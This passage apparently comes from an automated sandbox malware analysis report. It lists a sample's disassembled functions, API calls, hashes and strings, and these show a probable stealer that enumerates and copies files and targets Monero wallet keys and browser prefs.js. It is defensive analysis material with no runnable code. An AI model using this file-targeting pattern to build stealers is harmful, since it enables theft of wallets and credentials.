                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBF2AE
                          • FindClose.KERNEL32(000000FF), ref: 00CBF2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: efac081a6202558add822162bc03d334c02e4bea27c8c2f29795a048073ee47e
                          • Instruction ID: 678a8e2aa9b3c248a103613b84381edff782245b055953703a6ad4a405dda7c4
                          • Opcode Fuzzy Hash: efac081a6202558add822162bc03d334c02e4bea27c8c2f29795a048073ee47e
                          • Instruction Fuzzy Hash: 52E1BC7191111C9BEB54EB61DC5AFEE7338AF54304F4041ADF50A66092EE306F8ADF52
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CD15B8,00CD0D96), ref: 00CBF71E
                          • StrCmpCA.SHLWAPI(?,00CD15BC), ref: 00CBF76F
                          • StrCmpCA.SHLWAPI(?,00CD15C0), ref: 00CBF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00CBFAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: cdbe6710fa6f40249e012f4412cb7479780ddaed7be568926cfa3803eacb9220
                          • Instruction ID: f499e57e02872aeb6d4c862aa9025413c974bb933197faa5c4914e0216c0c1d9
                          • Opcode Fuzzy Hash: cdbe6710fa6f40249e012f4412cb7479780ddaed7be568926cfa3803eacb9220
                          • Instruction Fuzzy Hash: 52B144719001089BDB24FF61DC9AFEE7379AF94304F4085ADE50A96191EF306B4ADF92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: }`)$2,G^$;b{v$TR[$Z_=$_jn]$_q{i$`+$a>E_$a>E_$sk%
                          • API String ID: 0-3676237254
                          • Opcode ID: 9a4965d07a5722c634027f9e072a4f143e87464747ae211ddbc063d3cd2ac14d
                          • Instruction ID: 54068a1a9c7be7a506df9c3b528aaa7e4ae99eb6f6d16897c91aad19eaa66337
                          • Opcode Fuzzy Hash: 9a4965d07a5722c634027f9e072a4f143e87464747ae211ddbc063d3cd2ac14d
                          • Instruction Fuzzy Hash: 8FB21AF3A08200AFE704AE2DEC8567AFBE6EFD4720F1A853DE6C4C7744E57558058692
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CD510C,?,?,?,00CD51B4,?,?,00000000,?,00000000), ref: 00CB1923
                          • StrCmpCA.SHLWAPI(?,00CD525C), ref: 00CB1973
                          • StrCmpCA.SHLWAPI(?,00CD5304), ref: 00CB1989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CB1D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00CB1DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CB1E20
                          • FindClose.KERNEL32(000000FF), ref: 00CB1E32
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 77129aba93ea0e98bb1da584bd4c89b5a1c7629319cfc070f5820f1d37e6d927
                          • Instruction ID: 301189e1d3a2b8a38d3f662230419e20f09130b3ae6e0739a3590b92cc3e3835
                          • Opcode Fuzzy Hash: 77129aba93ea0e98bb1da584bd4c89b5a1c7629319cfc070f5820f1d37e6d927
                          • Instruction Fuzzy Hash: F312EB7191011C9BDB29EB61DC9AFEE7378AF54304F4041ADE50A66091EF306F8ADFA1
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00CD0C2E), ref: 00CBDE5E
                          • StrCmpCA.SHLWAPI(?,00CD14C8), ref: 00CBDEAE
                          • StrCmpCA.SHLWAPI(?,00CD14CC), ref: 00CBDEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBE3E0
                          • FindClose.KERNEL32(000000FF), ref: 00CBE3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 03ed694de09d9a5b0e5c2a48222840233c2a27b343cd1ec731c20b06d8fda5a5
                          • Instruction ID: 357df8ef15db7d9265ebf128b294d3884562cfa0f54913facb7ec3bb88625891
                          • Opcode Fuzzy Hash: 03ed694de09d9a5b0e5c2a48222840233c2a27b343cd1ec731c20b06d8fda5a5
                          • Instruction Fuzzy Hash: AFF17D7181011C9BDB25EB61DC9AFEE7338AF54304F9441EEE51A62091EF306F8ADE52
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CD14B0,00CD0C2A), ref: 00CBDAEB
                          • StrCmpCA.SHLWAPI(?,00CD14B4), ref: 00CBDB33
                          • StrCmpCA.SHLWAPI(?,00CD14B8), ref: 00CBDB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBDDCC
                          • FindClose.KERNEL32(000000FF), ref: 00CBDDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: fc0b1528939e15940ad31e4e760a42e33b86d6a76c8822562c61c3def5dded51
                          • Instruction ID: c4343229ea82f5bf2f45980a02e8624ca2f182d97a5d3d05470710f4acc3376e
                          • Opcode Fuzzy Hash: fc0b1528939e15940ad31e4e760a42e33b86d6a76c8822562c61c3def5dded51
                          • Instruction Fuzzy Hash: 6B9123729101089BCB14FB71EC5AEED737DAB84304F40866CF91A96181FE349B4DDB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: A4}$CBo$]$s$p!g}$vP)z$*M/$7wn$R}m$h1#
                          • API String ID: 0-4248928686
                          • Opcode ID: ddd2f22aa3e715035979eed07db9bbfebcb228b87ae539dbda9a3d32cab7f33f
                          • Instruction ID: 4bec45ac911768d9acacdd08de0d2cf48d0371a70e63a0f631f993b304b89969
                          • Opcode Fuzzy Hash: ddd2f22aa3e715035979eed07db9bbfebcb228b87ae539dbda9a3d32cab7f33f
                          • Instruction Fuzzy Hash: 74B2E4F350C2049FE304AE29EC8567AFBE9EF94720F1A492DE6C5C3744EA3598418797
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,00CD05AF), ref: 00CC7BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00CC7BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00CC7C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00CC7C62
                          • LocalFree.KERNEL32(00000000), ref: 00CC7D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: a2d204d6e48159c1a324f444b796b0c4d740530db61cc4d3ae2ced20a39b01b5
                          • Instruction ID: eba4617a347e9f676f943f643a1276f2b5c73ae4512939ec57481da4c860a768
                          • Opcode Fuzzy Hash: a2d204d6e48159c1a324f444b796b0c4d740530db61cc4d3ae2ced20a39b01b5
                          • Instruction Fuzzy Hash: BE413A7194021CABCB24DB95DC9DFEEB374FB44704F204299E50A66280DB742F89CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %(O$:/=$R$vu$RPo$n$ju$nC+
                          • API String ID: 0-2476655910
                          • Opcode ID: 54bb480ce785f37dbb2d73d226a6c7fb1859d883cfa5ab3aff1c2feac49d68ae
                          • Instruction ID: efb684b11ca9ba05430e89688a16e3a1d8d95f561471e7a25b78545c66b1b1d1
                          • Opcode Fuzzy Hash: 54bb480ce785f37dbb2d73d226a6c7fb1859d883cfa5ab3aff1c2feac49d68ae
                          • Instruction Fuzzy Hash: 1EB227F360C3049FE3046E6DEC8567AFBE9EF94620F1A453DEAC4C3744EA7598018696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /!~}$C@;/$G0gr$Zk':$`Jo$aX<]$~Gw
                          • API String ID: 0-3339710154
                          • Opcode ID: 090f488eb86893b5f5cb0ae194ff36796004f9da2179e073737575a70ee04b35
                          • Instruction ID: 73baf3a04a33cc8c3fbb0459421528d5afdd4b2db7d5846e17c05feacb58022f
                          • Opcode Fuzzy Hash: 090f488eb86893b5f5cb0ae194ff36796004f9da2179e073737575a70ee04b35
                          • Instruction Fuzzy Hash: F1B24CF3A082049FE3046E2DEC8567AFBE9EFD4720F16863DEAC5C3744E63558058696
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00CD0D73), ref: 00CBE4A2
                          • StrCmpCA.SHLWAPI(?,00CD14F8), ref: 00CBE4F2
                          • StrCmpCA.SHLWAPI(?,00CD14FC), ref: 00CBE508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00CBEBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
